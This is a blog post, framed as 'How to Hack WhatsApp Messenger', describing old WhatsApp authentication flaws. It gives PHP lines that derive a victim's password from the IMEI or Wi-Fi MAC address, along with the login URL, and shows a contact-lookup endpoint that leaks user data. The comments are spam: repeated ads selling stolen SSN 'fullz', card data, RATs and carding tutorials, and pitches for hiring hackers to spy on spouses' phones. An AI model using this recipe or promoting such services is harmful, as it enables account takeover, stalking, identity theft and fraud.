FREE MOBILE RECHARGE | For latest useful tricks visit Here!

­

How to Hack WhatsApp Messenger | Build WhatsApp API Client

 Whatsapp-closeup
Desktop IMs have long been our favorite mode of communication. But with time, their significance has definitely come down.
Smartphones taking large part of our daily life, IM services like Whatsapp, iMessage, BBM,  etc have emerged to be exchanging more messages every second. WhatsApp delivers more than 1 billion messages per day, but yet, its the most insecure way of communication.

As per a recent security analysis, WhatsApp is totally insecure way of communicating with friends.

WhatsApp Encryption

You will be surprised to know that until August 2012, messages sent through the WhatsApp service were not encrypted in any way, everything was sent in plaintext. That means if you were using Whatsapp on a public wifi, everything can be captured by anyone else sniffing ont he wireless network. The latest WhatsApp uses encryption but its this new encryption is broken. But still, phone number is sent out in plaintext.
The local storage isn’t any different, you can checkout WhatsApp Database Encryption Project Report

WhatsApp API & Reverse Engineering

If you know XMPP, the same protocol used by facebook, GTalk, and several others, you can try your hands-on WhatsAPI, an API for WhatsApp messenger.
WhatsApp uses customized XMPP server with proprietary extensions, named internally as FunXMPP.

1. WhatsApp Authentication / Login Mechanism

Just like any other XMPP, WhatsApp uses jabber id and password to login. The password is hashed, stored in servers upon account creation and used transparently everytime the client connects the server.

Its an incredibly horrible implementation. As researcher found out, the username is the user’s phone number – an attacker would probably already knows the victim’s number.
On Android, the password is a md5 hash of the reversed IMEI number:
$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash
On iOS, the password is generated from the devices WLAN MAC address:
$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice
Both IMEI and MAC address are easily retrievable from devices if you have physical access to it. MAC address is much easier to capture as you can sniff on the wireless network to which iOS device is connected.
The JID is a concatenation between your country’s code and mobile number.
Initial login uses Digest Access Authentication. You can try this for yourself:
https://r.whatsapp.net/v1/exist.php?
cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the users phone number 
(without the country calling code)
$password = see above, for iPhone use md5($wlanMAC.$wlanMAC), 
for Android use md5(strrev($imei))
The response you would receive would be in XML, containing messages designated for your phone.

2. Text Message communication

Messages are basically sent as TCP packets, following WhatsApp’s own format (unlike what’s defined in XMPP RFCs).
Photos, Videos and Audio files shared with WhatsApp contacts are HTTP-uploaded to a server before being sent to the recipient(s) along with Base64 thumbnail of media file (if applicable) along with the generated HTTP link as the message body.

WhatsApp Privacy Leak

WhatsApp shares your contacts with the server, we all know that. But the way it is done is ridiculously insecure. It basically sends contact information as:
https://sro.whatsapp.net/client/iphone/iq.php
?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1
&u[]=$friend2&u[]=$friend3&u[]=$friend4
The server response looks like:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>P</key>
<string>1234567890</string>
<key>T</key>
<integer>10817</integer>
<key>S</key>
<string>Some Status Message</string>
<key>JID</key>
<string>23xxxxxxxxx</string>
<key>NP</key>
<true/>
</dict>
</array>
</plist>
Key “P” is the users phone number, Key “T” seems to be the uptime(?), Key “S” is the users status message. Not sure about “JID” and “NP” yet – if you have smart guess let me know. All this information is public.

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

24 comments:

  1. What could be whatsapp password when I am using it from an android tablet

    ReplyDelete
    Replies
    1. LEGIT FULLZ & TOOLS STORE

      Hello to All !

      We are offering all types of tools & Fullz on discounted price.
      If you are in search of anything regarding fullz, tools, tutorials, Hack Pack, etc
      Feel Free to contact

      ***CONTACT 24/7***
      **Telegram > @leadsupplier
      **ICQ > 752822040
      **Skype > Peeterhacks
      **Wicker me > peeterhacks

      "SSN LEADS/FULLZ AVAILABLE"
      "TOOLS & TUTORIALS AVAILABLE FOR HACKING, SPAMMING,
      CARDING, CASHOUT, CLONING, SCRIPTING ETC"

      **************************************
      "Fresh Spammed SSN Fullz info included"
      >>SSN FULLZ with complete info
      >>CC With CVV Fullz USA
      >>FULLZ FOR SBA, PUA & TAX RETURN FILLING
      >>USA I.D Photos Front & Back
      >>High Credit Score fullz (700+ Scores)
      >>DL number, Employee Details, Bank Details Included
      >>Complete Premium Info with Relative Info

      ***************************************
      COMPLETE GUIDE FOR TUTORIALS & TOOLS

      "SPAMMING" "HACKING" "CARDING" "CASH OUT"
      "KALI LINUX" "BLOCKCHAIN BLUE PRINTS" "SCRIPTING"
      "FRAUD BIBLE"

      "TOOLS & TUTORIALS LIST"
      =>Ethical Hacking Ebooks, Tools & Tutorials
      =>Bitcoin Hacking
      =>Kali Linux
      =>Fraud Bible
      =>RAT
      =>Keylogger & Keystroke Logger
      =>Whatsapp Hacking & Hacked Version of Whatsapp
      =>Facebook & Google Hacking
      =>Bitcoin Flasher
      =>SQL Injector
      =>Premium Logs (PayPal/Amazon/Coinbase/Netflix/FedEx/Banks)
      =>Bitcoin Cracker
      =>SMTP Linux Root
      =>Shell Scripting
      =>DUMPS with pins track 1 and 2 with & without pin
      =>SMTP's, Safe Socks, Rdp's brute
      =>PHP mailer
      =>SMS Sender & Email Blaster
      =>Cpanel
      =>Server I.P's & Proxies
      =>Viruses & VPN's
      =>HQ Email Combo (Gmail, Yahoo, Hotmail, MSN, AOL, etc.)

      *Serious buyers will always welcome
      *Price will be reduce in bulk order
      *Discount offers will gives to serious buyers
      *Hope we do a great business together

      ===>Contact 24/7<===
      ==>Telegram > @leadsupplier
      ==>ICQ > 752822040
      ==>Skype > Peeterhacks
      ==>Wicker me > peeterhacks

      Delete

  2. I got access to my husband’s mobile phone through the help of Mr James (Worldcyberhackers) on Gmail or WhatsApp:+12678773020 . He helped me in Hacking my husband’s iPhone and I got all his text messages. I’m so sad he is cheating on me. I’m sending all evidence to my lawyer. Thank you Mr James.

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. Hello Everyone !

    USA SSN Leads/Dead Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete
  5. If you think your spouse is cheating, and you need to hire a real hacker to remotely monitor / hack their phone, recover your stolen bitcoin / any other cryptocurrency, or hack a database and clear bad records with guaranteed privacy, contact easybinarysolutions@gmail.com or whatsapp: +1 3478577580, they are efficient and confidential.

    ReplyDelete
  6. **SELLING SSN+DOB FULLZ**

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    >>1$ each without DL/ID number
    >>2$ each with DL
    >>5$ each for premium (also included relative info)

    *Will reduce price if buying in bulk
    *Hope for a long term business

    FORMAT OF LEADS/FULLZ/PROS

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->COMPLETE ADDRESS
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYMENT DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    >Fresh Leads for tax returns & w-2 form filling
    >Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY

    ''OTHER GADGETS PROVIDING''

    >SSN+DOB Fullz
    >CC with CVV
    >Photo ID's
    >Dead Fullz
    >Spamming Tutorials
    >Carding Tutorials
    >Hacking Tutorials
    >SMTP Linux Root
    >DUMPS with pins track 1 and 2
    >Sock Tools
    >Server I.P's
    >HQ Emails with passwords

    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    THANK YOU

    ReplyDelete
  7. WhatsApp API
    We provide best WhatsApp API services across India. Send promotional Bulk SMS Marketing or buy WhatsApp Bulk Marketing Software to grow your business with Mart2global.

    ReplyDelete
  8. LEGIT FULLZ & TOOLS STORE

    Hello to All !

    We are offering all types of tools & Fullz on discounted price.
    If you are in search of anything regarding fullz, tools, tutorials, Hack Pack, etc
    Feel Free to contact

    ***CONTACT 24/7***
    **Telegram > @leadsupplier
    **ICQ > 752822040
    **Skype > Peeterhacks
    **Wicker me > peeterhacks

    "SSN LEADS/FULLZ AVAILABLE"
    "TOOLS & TUTORIALS AVAILABLE FOR HACKING, SPAMMING,
    CARDING, CASHOUT, CLONING, SCRIPTING ETC"

    **************************************
    "Fresh Spammed SSN Fullz info included"
    >>SSN FULLZ with complete info
    >>CC With CVV Fullz USA
    >>FULLZ FOR SBA, PUA & TAX RETURN FILLING
    >>USA I.D Photos Front & Back
    >>High Credit Score fullz (700+ Scores)
    >>DL number, Employee Details, Bank Details Included
    >>Complete Premium Info with Relative Info

    ***************************************
    COMPLETE GUIDE FOR TUTORIALS & TOOLS

    "SPAMMING" "HACKING" "CARDING" "CASH OUT"
    "KALI LINUX" "BLOCKCHAIN BLUE PRINTS" "SCRIPTING"
    "FRAUD BIBLE"

    "TOOLS & TUTORIALS LIST"
    =>Ethical Hacking Ebooks, Tools & Tutorials
    =>Bitcoin Hacking
    =>Kali Linux
    =>Fraud Bible
    =>RAT
    =>Keylogger & Keystroke Logger
    =>Whatsapp Hacking & Hacked Version of Whatsapp
    =>Facebook & Google Hacking
    =>Bitcoin Flasher
    =>SQL Injector
    =>Premium Logs (PayPal/Amazon/Coinbase/Netflix/FedEx/Banks)
    =>Bitcoin Cracker
    =>SMTP Linux Root
    =>Shell Scripting
    =>DUMPS with pins track 1 and 2 with & without pin
    =>SMTP's, Safe Socks, Rdp's brute
    =>PHP mailer
    =>SMS Sender & Email Blaster
    =>Cpanel
    =>Server I.P's & Proxies
    =>Viruses & VPN's
    =>HQ Email Combo (Gmail, Yahoo, Hotmail, MSN, AOL, etc.)

    *Serious buyers will always welcome
    *Price will be reduce in bulk order
    *Discount offers will gives to serious buyers
    *Hope we do a great business together

    ===>Contact 24/7<===
    ==>Telegram > @leadsupplier
    ==>ICQ > 752822040
    ==>Skype > Peeterhacks
    ==>Wicker me > peeterhacks

    ReplyDelete